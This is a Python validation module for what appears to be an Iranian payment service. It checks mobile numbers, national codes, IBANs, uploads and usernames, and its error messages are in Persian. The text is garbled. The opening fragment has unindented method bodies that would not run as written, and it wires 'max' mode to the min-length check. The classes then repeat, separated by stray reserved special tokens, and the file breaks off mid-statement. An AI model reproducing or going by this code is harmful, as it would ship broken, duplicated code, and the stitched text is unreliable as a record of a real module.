        self.addValidation({'field': field, 'value': data}, self.
            _check_with_phoneNumberValidator)
        return self
    def checkMobile(self, field, data='unAssigned'):
        # Queue the Iranian mobile-number (09xxxxxxxxx) check; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_mobileValidator)
        return self
    def checkEmail(self, field, data='unAssigned'):
        # Queue the e-mail syntax check; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_emailValidator)
        return self
    def checkNotNone(self, field, data='unAssigned'):
        # Queue the None/empty-string check; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_noneValidator)
        return self
    def checkFile(self, field, data, **options):
        # Queue upload validation; options may include types=[...] substrings
        # matched against the file's content_type. Returns self.
        self.addValidation({'field': field, 'value': data, 'options':
            options}, self._check_with_fileValidator)
        return self
    def checkIBAN(self, field, data='unAssigned'):
        # Queue the IBAN format/checksum validation; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_IBANValidator)
        return self
    def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
        # Queue the active-SubMerchant lookup for this user/sub pair; returns self.
        data = {'userId': userId, 'subId': subId}
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_subMerchantBankAccountValidator)
        return self
def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length
}, validatorFunction)
return self
    def checkInputData(self, field, data='unAssigned'):
        # Queue the non-empty input check; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_inputValidator)
        return self
    def checkTelephone(self, field, data='unAssigned'):
        # Alias of checkPhone: queues the same phone-number validator; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_phoneNumberValidator)
        return self
    def checkIsIbanTransferable(self, field, data='unAssigned'):
        # Queue the non-transferable-IBAN rule; returns self.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_IbanTransferable)
        return self
def checkUsername(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_username())
class DataValidator:
    """Facade that aggregates a FieldValidator and an ObjectValidator and
    merges their results into one error dict and one status code."""

    def __init__(self, data=None):
        # ``None`` default instead of a mutable ``{}`` default so
        # independent instances can never share one dict.
        self.fieldValidator = FieldValidator(data if data is not None else {})
        self.objectValidator = ObjectValidator()
        self.errors = {}
        self.statusCode = 200

    def getValidatorsErrors(self):
        """Run both validators, merge their per-field errors into
        ``self.errors``, derive ``self.statusCode`` and return the dict."""
        self.objectValidator.validate()
        self.fieldValidator.validate()
        for key, messages in self.fieldValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
        self.statusCode = self.fieldValidator.statusCode
        for key, messages in self.objectValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
        # Object-level failures take precedence over the field-level status.
        if self.objectValidator.statusCode != 200:
            self.statusCode = self.objectValidator.statusCode
        return self.errors

    def generateMessage(self):
        """Map well-known error keys to user-facing (Persian) messages."""
        messages = []
        errorKeys = self.errors.keys()
        if 'email' in errorKeys:
            messages.append(' آدرس ایمیل نامعتبر است')
        if 'name' in errorKeys:
            messages.append('نام را وارد کنید')
        if 'username' in errorKeys:
            messages.append('نام کاربری را وارد کنید')
        if 'password' in errorKeys:
            messages.append('رمز عبور را وارد کنید')
        if 'mobile' in errorKeys:
            messages.append('تلفن همراه خود را وارد کنید.')
        if 'phone' in errorKeys:
            messages.append(
                'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
        if 'iban' in errorKeys or 'IBAN' in errorKeys:
            messages.append(
                'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
                )
        if 'user' in errorKeys:
            messages.append('لطفا وارد شوید')
        return messages
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ObjectValidator:
    """Pipeline of object-level validations (authentication, existence,
    uniqueness), mirroring FieldValidator's chainable check* API."""

    def __init__(self, validationData=None, *args, **kwargs):
        # ``None`` default instead of a mutable ``{}`` default.
        self.data = validationData if validationData is not None else {}
        self.statusCode = 200
        self.validationPipeline = []
        self.errors = {}
        self.invalidFields = []

    def flush(self):
        """Return a fresh, empty validator; the receiver is untouched."""
        return ObjectValidator()

    def setError(self, field, error):
        """Record ``error`` (a ``(message, status)`` tuple) for ``field``,
        at most once per field."""
        if field not in self.invalidFields:
            fieldErrors = self.errors.get(field, [])
            if error[0] not in fieldErrors:
                self.errors[field] = fieldErrors + [error[0]]
            self.statusCode = error[1]
            self.invalidFields.append(field)

    def getErrors(self):
        """Return the ``field -> [messages]`` error mapping."""
        return self.errors

    def validate(self):
        """Run every queued validation."""
        for validation in self.validationPipeline:
            try:
                validation['validator'](validation['data'])
            except Exception:
                # A crashing validator marks its field invalid instead of
                # aborting the pipeline.  (Was a bare ``except:``, which
                # also swallowed SystemExit/KeyboardInterrupt.)
                self.setError(validation['data']['field'], enum.Error.
                    INVALID_FIELD_DATA.value)

    def addValidation(self, data, validatorFunction):
        """Queue one validation for :meth:`validate`."""
        self.validationPipeline.append({'data': data, 'validator':
            validatorFunction})

    def _check_with_authenticationValidator(self, data):
        """Fail when the request user is not authenticated."""
        if not data['user'].is_authenticated:
            self.setError(data['field'], enum.Error.UNAUTHORIZED.value)

    def _check_with_nonDuplicateObjectValidator(self, data):
        """Fail when a row already matches the filter (use .exists() so the
        rows themselves are never fetched)."""
        if data['model'].objects.filter(**data['filter']).exists():
            self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)

    def _check_with_ObjectExistenceValidator(self, data):
        """Fail when no row matches the filter."""
        if not data['model'].objects.filter(**data['filter']).exists():
            self.setError(data['field'], enum.Error.
                GENERIC_OBJECT_NOT_FOUND.value)

    def checkNonDuplicateObject(self, field, model, **filter):
        # Queue a uniqueness check; returns self for chaining.
        self.addValidation({'field': field, 'model': model, 'filter':
            filter}, self._check_with_nonDuplicateObjectValidator)
        return self

    def checkObjectExistence(self, field, model, **filter):
        # Queue an existence check; returns self for chaining.
        self.addValidation({'field': field, 'model': model, 'filter':
            filter}, self._check_with_ObjectExistenceValidator)
        return self

    def checkUserAuthentication(self, field, user):
        # Queue an authentication check; returns self for chaining.
        self.addValidation({'field': field, 'user': user}, self.
            _check_with_authenticationValidator)
        return self
class FieldValidator:
    """Chainable, pipeline-based field validator.

    Register checks with the ``check*`` methods (each returns ``self`` so
    calls can be chained), then call :meth:`validate` to run the pipeline.
    Failures are collected per field in ``errors``; ``statusCode`` holds
    the status of the last recorded failure (200 when everything passed).
    """

    def __init__(self, validationData=None, *args, **kwargs):
        # ``None`` default instead of a mutable ``{}`` default so
        # independent instances can never share one dict.
        self.data = validationData if validationData is not None else {}
        self.validationPipeline = []
        self.statusCode = 200
        self.errors = {}
        self.invalidFields = []

    def flush(self):
        """Return a fresh, empty validator.

        Fix: the original only rebound the local name ``self`` and returned
        ``None``; ObjectValidator.flush returns the new instance, so do the
        same here for consistency.
        """
        return FieldValidator()

    def setError(self, field, error):
        """Record ``error`` (a ``(message, status)`` tuple) for ``field``,
        at most once per field."""
        if field not in self.invalidFields:
            fieldErrors = self.errors.get(field, [])
            if error[0] not in fieldErrors:
                self.errors[field] = fieldErrors + [error[0]]
            self.statusCode = error[1]
            self.invalidFields.append(field)

    def getErrors(self):
        """Return the ``field -> [messages]`` error mapping."""
        return self.errors

    def validate(self):
        """Run every queued validation and return ``self``."""
        for validation in self.validationPipeline:
            try:
                validation['validator'](validation['data'])
            except Exception:
                # A crashing validator marks its field invalid instead of
                # aborting the pipeline.  (Was a bare ``except:``, which
                # also swallowed SystemExit/KeyboardInterrupt.)
                self.setError(validation['data']['field'], enum.Error.
                    INVALID_FIELD_DATA.value)
        return self

    def addValidation(self, data, validatorFunction):
        """Queue one validation; a value of ``'unAssigned'`` is resolved
        from ``self.data`` (``None`` when the field is absent)."""
        if data['value'] == 'unAssigned':
            data['value'] = self.data.get(data['field'])
        self.validationPipeline.append({'data': data, 'validator':
            validatorFunction})

    def _check_with_typeValidator(self, data):
        """Fail unless the value is an instance of the requested type."""
        if not isinstance(data['value'], data['type']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_nationalLegalCodeValidator(self, data):
        """Iranian legal-entity national id (shenase melli) checksum:
        11 digits; the weighted sum of the first 10 digits (each offset by
        the 10th digit + 2) mod 11 must equal the final control digit."""
        nationalLegalCode = data['value']
        if len(nationalLegalCode) != 11:
            self.setError(data['field'], enum.Error.
                INVALID_NATIONAL_LEGAL_CODE.value)
            return
        validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
        result = 0
        for i in range(10):
            result += (int(nationalLegalCode[-2]) + 2 + int(
                nationalLegalCode[i])) * validationList[i]
        reminder = 0 if result % 11 == 10 else result % 11
        if reminder != int(nationalLegalCode[-1]):
            self.setError(data['field'], enum.Error.
                INVALID_NATIONAL_LEGAL_CODE.value)

    def _is_valid_national_code(self, nCode):
        """Shared Iranian national-code (code melli) checksum used by the
        three national-code validators below: 10 digits, weighted-sum
        mod-11 rule.  (Consolidates three duplicated copies.)"""
        if len(nCode) != 10:
            return False
        total = 0
        for i in range(9):
            total += int(nCode[i]) * (10 - i)
        r = total % 11
        return r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(
            nCode[9])

    def _check_with_nationalCodeValidator(self, data):
        """Fail unless the value passes the national-code checksum."""
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_officer1NationalCodeValidator(self, data):
        """Same checksum, kept as a separate hook so officer-1 errors land
        on their own field."""
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_officer2NationalCodeValidator(self, data):
        """Same checksum for the officer-2 field."""
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_featuresValidator(self, data):
        """Fail when any requested feature is outside the allowed set."""
        allowed = ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
            'درگاه پرداخت اینترنتی']
        for feature in data['value']:
            if feature not in allowed:
                self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
                    value)
                break

    def _check_with_userNameValidator(self, data):
        """Reject reserved words ('admin', 'zibal') and malformed names."""
        username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
        if 'admin' in data['value'] or 'zibal' in data['value'
            ] or username is None:
            self.setError(data['field'], enum.Error.INVALID_USERNAME.value)

    def _check_with_phoneNumberValidator(self, data):
        """Fail when the phone number is missing or empty.

        Fix: the original tested ``len(data) < 1`` — the length of the
        wrapper dict, which is never empty — so empty strings passed.
        """
        if data['value'] is None or len(data['value']) < 1:
            self.setError(data['field'], enum.Error.
                PHONE_INCORRECT_TEMPLATE.value)

    def _check_with_mobileValidator(self, data):
        """Iranian mobile number: exactly 11 digits starting with 09."""
        mobileNumber = data['value']
        if mobileNumber is None:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if re.match('(^09[0-9]{9}$)', mobileNumber) is None:
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_emailValidator(self, data):
        """Syntactic e-mail validation."""
        email = data['value']
        if email is None:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if re.match('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)',
                email) is None:
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_noneValidator(self, data):
        """Fail on ``None`` or the empty string."""
        if data['value'] is None or data['value'] == '':
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)

    def _check_with_fileValidator(self, data):
        """Uploaded-file validation: presence, size limit, content type.

        Fix: the content-type check is only enforced when a ``types``
        option was supplied via ``checkFile``; previously a missing
        ``types`` option made every file fail with REQUEST_TYPE_ERROR.
        """
        file = data['value']
        field = data['field']
        if file is None:
            self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if file.size > enum.Limits.FILE_SIZE_LIMIT.value:
            self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
        types = data['options'].get('types', None)
        if types is not None and not any(type in file.content_type for
                type in types):
            self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)

    def _check_with_IBANValidator(self, data):
        """Iranian IBAN: 26 chars, 'IR' prefix, ISO 13616 mod-97 checksum
        (rotate first four chars to the end, substitute I->18 / R->27,
        the resulting number mod 97 must be 1)."""
        iban = data['value']
        if len(iban) != 26 or not iban.startswith('IR'):
            self.setError(data['field'], enum.Error.IBAN_ERROR.value)
            return
        code = iban[4:] + iban[:4]
        code = code.replace('I', '18').replace('R', '27')
        if int(code) % 97 != 1:
            self.setError(data['field'], enum.Error.IBAN_ERROR.value)

    def _check_with_subMerchantBankAccountValidator(self, data):
        """Fail unless an *active* (status=1) SubMerchant row matches the
        given user/sub ids."""
        if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
            =data['value']['subId'], status=1).exists():
            self.setError(data['field'], enum.Error.
                IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)

    def _check_with_minDataLengthValidator(self, data):
        """Fail when the value is missing or shorter than ``length``."""
        if data['value'] is None or len(data['value']) < data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_maxDataLengthValidator(self, data):
        """Fail when the value is missing or longer than ``length``.

        NOTE(review): reuses the 'insufficient length' message for the
        over-length case — confirm the wording is intended.
        """
        if data['value'] is None or len(data['value']) > data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_equalDataLengthValidator(self, data):
        """Fail unless the value's length is exactly ``length``."""
        if data['value'] is None or len(data['value']) != data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_inputValidator(self, data):
        """Fail when the value is missing or empty."""
        if data['value'] is None or len(data['value']) < 1:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)

    def _check_with_IbanTransferable(self, data):
        """Reject IBANs that cannot receive transfers.

        NOTE(review): '062' / '080' look like bank/branch codes — confirm
        which institutions they identify before changing this rule.
        """
        if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
            self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
                )

    def _check_with_username(self, data):
        """Usernames may contain only letters, digits, '_', '.' and '-'."""
        if re.match('^[a-zA-Z0-9_.-]+$', data['value']) is None:
            self.setError(data['field'], enum.Error.INVALID_USERNAME.value)

    # --- registration helpers: each queues one validator, returns self ---

    def checkType(self, field, type, value='unAssigned'):
        self.addValidation({'field': field, 'type': type, 'value': value},
            self._check_with_typeValidator)
        return self

    def checkNationalLegalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_nationalLegalCodeValidator)
        return self

    def checkOfficer1NationalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_officer1NationalCodeValidator)
        return self

    def checkOfficer2NationalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_officer2NationalCodeValidator)
        return self

    def checkNationalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_nationalCodeValidator)
        return self

    def checkFeatures(self, field, features='unAssigned'):
        self.addValidation({'field': field, 'value': features}, self.
            _check_with_featuresValidator)
        return self

    def checkUserName(self, field, username='unAssigned'):
        self.addValidation({'field': field, 'value': username}, self.
            _check_with_userNameValidator)
        return self

    def checkPhone(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_phoneNumberValidator)
        return self

    def checkMobile(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_mobileValidator)
        return self

    def checkEmail(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_emailValidator)
        return self

    def checkNotNone(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_noneValidator)
        return self

    def checkFile(self, field, data, **options):
        self.addValidation({'field': field, 'value': data, 'options':
            options}, self._check_with_fileValidator)
        return self

    def checkIBAN(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_IBANValidator)
        return self

    def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
        data = {'userId': userId, 'subId': subId}
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_subMerchantBankAccountValidator)
        return self

    def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
        """Queue a length check; ``mode`` is 'equal', 'min' or 'max'.

        Fix: ``mode='max'`` used to register the *min*-length validator, so
        over-length values were never caught; an unknown mode used to raise
        NameError and now falls back to the equality check.
        """
        if mode == 'min':
            validatorFunction = self._check_with_minDataLengthValidator
        elif mode == 'max':
            validatorFunction = self._check_with_maxDataLengthValidator
        else:
            validatorFunction = self._check_with_equalDataLengthValidator
        self.addValidation({'field': field, 'value': data, 'length': length
            }, validatorFunction)
        return self

    def checkInputData(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_inputValidator)
        return self

    def checkTelephone(self, field, data='unAssigned'):
        # Alias of checkPhone: registers the same validator.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_phoneNumberValidator)
        return self

    def checkIsIbanTransferable(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_IbanTransferable)
        return self

    def checkUsername(self, field, data='unAssigned'):
        """Queue the username-pattern validator; returns self.

        Fix: the validator used to be *called* at registration time
        (``self._check_with_username()`` — TypeError) and the method did
        not return ``self`` like every other ``check*`` helper.
        """
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_username)
        return self
class DataValidator:
    """Facade that aggregates a FieldValidator and an ObjectValidator and
    merges their results into one error dict and one status code."""

    def __init__(self, data=None):
        # ``None`` default instead of a mutable ``{}`` default so
        # independent instances can never share one dict.
        self.fieldValidator = FieldValidator(data if data is not None else {})
        self.objectValidator = ObjectValidator()
        self.errors = {}
        self.statusCode = 200

    def getValidatorsErrors(self):
        """Run both validators, merge their per-field errors into
        ``self.errors``, derive ``self.statusCode`` and return the dict."""
        self.objectValidator.validate()
        self.fieldValidator.validate()
        for key, messages in self.fieldValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
        self.statusCode = self.fieldValidator.statusCode
        for key, messages in self.objectValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
        # Object-level failures take precedence over the field-level status.
        if self.objectValidator.statusCode != 200:
            self.statusCode = self.objectValidator.statusCode
        return self.errors

    def generateMessage(self):
        """Map well-known error keys to user-facing (Persian) messages."""
        messages = []
        errorKeys = self.errors.keys()
        if 'email' in errorKeys:
            messages.append(' آدرس ایمیل نامعتبر است')
        if 'name' in errorKeys:
            messages.append('نام را وارد کنید')
        if 'username' in errorKeys:
            messages.append('نام کاربری را وارد کنید')
        if 'password' in errorKeys:
            messages.append('رمز عبور را وارد کنید')
        if 'mobile' in errorKeys:
            messages.append('تلفن همراه خود را وارد کنید.')
        if 'phone' in errorKeys:
            messages.append(
                'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
        if 'iban' in errorKeys or 'IBAN' in errorKeys:
            messages.append(
                'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
                )
        if 'user' in errorKeys:
            messages.append('لطفا وارد شوید')
        return messages
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ObjectValidator:
    """Pipeline of object-level validations (authentication, existence,
    uniqueness), mirroring FieldValidator's chainable check* API."""

    def __init__(self, validationData=None, *args, **kwargs):
        # ``None`` default instead of a mutable ``{}`` default.
        self.data = validationData if validationData is not None else {}
        self.statusCode = 200
        self.validationPipeline = []
        self.errors = {}
        self.invalidFields = []

    def flush(self):
        """Return a fresh, empty validator; the receiver is untouched."""
        return ObjectValidator()

    def setError(self, field, error):
        """Record ``error`` (a ``(message, status)`` tuple) for ``field``,
        at most once per field."""
        if field not in self.invalidFields:
            fieldErrors = self.errors.get(field, [])
            if error[0] not in fieldErrors:
                self.errors[field] = fieldErrors + [error[0]]
            self.statusCode = error[1]
            self.invalidFields.append(field)

    def getErrors(self):
        """Return the ``field -> [messages]`` error mapping."""
        return self.errors

    def validate(self):
        """Run every queued validation."""
        for validation in self.validationPipeline:
            try:
                validation['validator'](validation['data'])
            except Exception:
                # A crashing validator marks its field invalid instead of
                # aborting the pipeline.  (Was a bare ``except:``, which
                # also swallowed SystemExit/KeyboardInterrupt.)
                self.setError(validation['data']['field'], enum.Error.
                    INVALID_FIELD_DATA.value)

    def addValidation(self, data, validatorFunction):
        """Queue one validation for :meth:`validate`."""
        self.validationPipeline.append({'data': data, 'validator':
            validatorFunction})

    def _check_with_authenticationValidator(self, data):
        """Fail when the request user is not authenticated."""
        if not data['user'].is_authenticated:
            self.setError(data['field'], enum.Error.UNAUTHORIZED.value)

    def _check_with_nonDuplicateObjectValidator(self, data):
        """Fail when a row already matches the filter (use .exists() so the
        rows themselves are never fetched)."""
        if data['model'].objects.filter(**data['filter']).exists():
            self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)

    def _check_with_ObjectExistenceValidator(self, data):
        """Fail when no row matches the filter."""
        if not data['model'].objects.filter(**data['filter']).exists():
            self.setError(data['field'], enum.Error.
                GENERIC_OBJECT_NOT_FOUND.value)

    def checkNonDuplicateObject(self, field, model, **filter):
        # Queue a uniqueness check; returns self for chaining.
        self.addValidation({'field': field, 'model': model, 'filter':
            filter}, self._check_with_nonDuplicateObjectValidator)
        return self

    def checkObjectExistence(self, field, model, **filter):
        # Queue an existence check; returns self for chaining.
        self.addValidation({'field': field, 'model': model, 'filter':
            filter}, self._check_with_ObjectExistenceValidator)
        return self

    def checkUserAuthentication(self, field, user):
        # Queue an authentication check; returns self for chaining.
        self.addValidation({'field': field, 'user': user}, self.
            _check_with_authenticationValidator)
        return self
class FieldValidator:
    """Chainable, pipeline-based field validator.

    Register checks with the ``check*`` methods (each returns ``self`` so
    calls can be chained), then call :meth:`validate` to run the pipeline.
    Failures are collected per field in ``errors``; ``statusCode`` holds
    the status of the last recorded failure (200 when everything passed).
    """

    def __init__(self, validationData=None, *args, **kwargs):
        # ``None`` default instead of a mutable ``{}`` default so
        # independent instances can never share one dict.
        self.data = validationData if validationData is not None else {}
        self.validationPipeline = []
        self.statusCode = 200
        self.errors = {}
        self.invalidFields = []

    def flush(self):
        """Return a fresh, empty validator.

        Fix: the original only rebound the local name ``self`` and returned
        ``None``; ObjectValidator.flush returns the new instance, so do the
        same here for consistency.
        """
        return FieldValidator()

    def setError(self, field, error):
        """Record ``error`` (a ``(message, status)`` tuple) for ``field``,
        at most once per field."""
        if field not in self.invalidFields:
            fieldErrors = self.errors.get(field, [])
            if error[0] not in fieldErrors:
                self.errors[field] = fieldErrors + [error[0]]
            self.statusCode = error[1]
            self.invalidFields.append(field)

    def getErrors(self):
        """Return the ``field -> [messages]`` error mapping."""
        return self.errors

    def validate(self):
        """Run every queued validation and return ``self``."""
        for validation in self.validationPipeline:
            try:
                validation['validator'](validation['data'])
            except Exception:
                # A crashing validator marks its field invalid instead of
                # aborting the pipeline.  (Was a bare ``except:``, which
                # also swallowed SystemExit/KeyboardInterrupt.)
                self.setError(validation['data']['field'], enum.Error.
                    INVALID_FIELD_DATA.value)
        return self

    def addValidation(self, data, validatorFunction):
        """Queue one validation; a value of ``'unAssigned'`` is resolved
        from ``self.data`` (``None`` when the field is absent)."""
        if data['value'] == 'unAssigned':
            data['value'] = self.data.get(data['field'])
        self.validationPipeline.append({'data': data, 'validator':
            validatorFunction})

    def _check_with_typeValidator(self, data):
        """Fail unless the value is an instance of the requested type."""
        if not isinstance(data['value'], data['type']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_nationalLegalCodeValidator(self, data):
        """Iranian legal-entity national id (shenase melli) checksum:
        11 digits; the weighted sum of the first 10 digits (each offset by
        the 10th digit + 2) mod 11 must equal the final control digit."""
        nationalLegalCode = data['value']
        if len(nationalLegalCode) != 11:
            self.setError(data['field'], enum.Error.
                INVALID_NATIONAL_LEGAL_CODE.value)
            return
        validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
        result = 0
        for i in range(10):
            result += (int(nationalLegalCode[-2]) + 2 + int(
                nationalLegalCode[i])) * validationList[i]
        reminder = 0 if result % 11 == 10 else result % 11
        if reminder != int(nationalLegalCode[-1]):
            self.setError(data['field'], enum.Error.
                INVALID_NATIONAL_LEGAL_CODE.value)

    def _is_valid_national_code(self, nCode):
        """Shared Iranian national-code (code melli) checksum used by the
        three national-code validators below: 10 digits, weighted-sum
        mod-11 rule.  (Consolidates three duplicated copies.)"""
        if len(nCode) != 10:
            return False
        total = 0
        for i in range(9):
            total += int(nCode[i]) * (10 - i)
        r = total % 11
        return r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(
            nCode[9])

    def _check_with_nationalCodeValidator(self, data):
        """Fail unless the value passes the national-code checksum."""
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_officer1NationalCodeValidator(self, data):
        """Same checksum, kept as a separate hook so officer-1 errors land
        on their own field."""
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_officer2NationalCodeValidator(self, data):
        """Same checksum for the officer-2 field."""
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_featuresValidator(self, data):
        """Fail when any requested feature is outside the allowed set."""
        allowed = ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
            'درگاه پرداخت اینترنتی']
        for feature in data['value']:
            if feature not in allowed:
                self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
                    value)
                break

    def _check_with_userNameValidator(self, data):
        """Reject reserved words ('admin', 'zibal') and malformed names."""
        username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
        if 'admin' in data['value'] or 'zibal' in data['value'
            ] or username is None:
            self.setError(data['field'], enum.Error.INVALID_USERNAME.value)

    def _check_with_phoneNumberValidator(self, data):
        """Fail when the phone number is missing or empty.

        Fix: the original tested ``len(data) < 1`` — the length of the
        wrapper dict, which is never empty — so empty strings passed.
        """
        if data['value'] is None or len(data['value']) < 1:
            self.setError(data['field'], enum.Error.
                PHONE_INCORRECT_TEMPLATE.value)

    def _check_with_mobileValidator(self, data):
        """Iranian mobile number: exactly 11 digits starting with 09."""
        mobileNumber = data['value']
        if mobileNumber is None:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if re.match('(^09[0-9]{9}$)', mobileNumber) is None:
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_emailValidator(self, data):
        """Syntactic e-mail validation."""
        email = data['value']
        if email is None:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if re.match('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)',
                email) is None:
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_noneValidator(self, data):
        """Fail on ``None`` or the empty string."""
        if data['value'] is None or data['value'] == '':
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)

    def _check_with_fileValidator(self, data):
        """Uploaded-file validation: presence, size limit, content type.

        Fix: the content-type check is only enforced when a ``types``
        option was supplied via ``checkFile``; previously a missing
        ``types`` option made every file fail with REQUEST_TYPE_ERROR.
        """
        file = data['value']
        field = data['field']
        if file is None:
            self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if file.size > enum.Limits.FILE_SIZE_LIMIT.value:
            self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
        types = data['options'].get('types', None)
        if types is not None and not any(type in file.content_type for
                type in types):
            self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)

    def _check_with_IBANValidator(self, data):
        """Iranian IBAN: 26 chars, 'IR' prefix, ISO 13616 mod-97 checksum
        (rotate first four chars to the end, substitute I->18 / R->27,
        the resulting number mod 97 must be 1)."""
        iban = data['value']
        if len(iban) != 26 or not iban.startswith('IR'):
            self.setError(data['field'], enum.Error.IBAN_ERROR.value)
            return
        code = iban[4:] + iban[:4]
        code = code.replace('I', '18').replace('R', '27')
        if int(code) % 97 != 1:
            self.setError(data['field'], enum.Error.IBAN_ERROR.value)

    def _check_with_subMerchantBankAccountValidator(self, data):
        """Fail unless an *active* (status=1) SubMerchant row matches the
        given user/sub ids."""
        if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
            =data['value']['subId'], status=1).exists():
            self.setError(data['field'], enum.Error.
                IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)

    def _check_with_minDataLengthValidator(self, data):
        """Fail when the value is missing or shorter than ``length``."""
        if data['value'] is None or len(data['value']) < data['length']:
            self.setError(data['field'], (enum.Error.
